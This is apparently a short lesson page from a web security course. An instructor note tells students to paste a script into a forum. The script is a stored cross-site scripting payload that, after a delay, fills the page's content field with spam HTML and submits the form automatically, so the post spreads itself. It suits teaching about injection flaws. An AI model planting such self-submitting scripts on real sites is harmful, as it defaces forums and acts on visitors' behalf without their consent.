11. Spammy Tables
Spammy Tables
INSTRUCTOR NOTE:
Paste this text into your forum (including the script tags!) and submit it:
<script>
setTimeout(function() {
var tt = document.getElementById('content');
tt.value = "<h2 style='color: #FF6699; font-family: Comic Sans MS'>Spam, spam, spam, spam,<br>Wonderful spam, glorious spam!</h2>";
tt.form.submit();
}, 2500);
</script>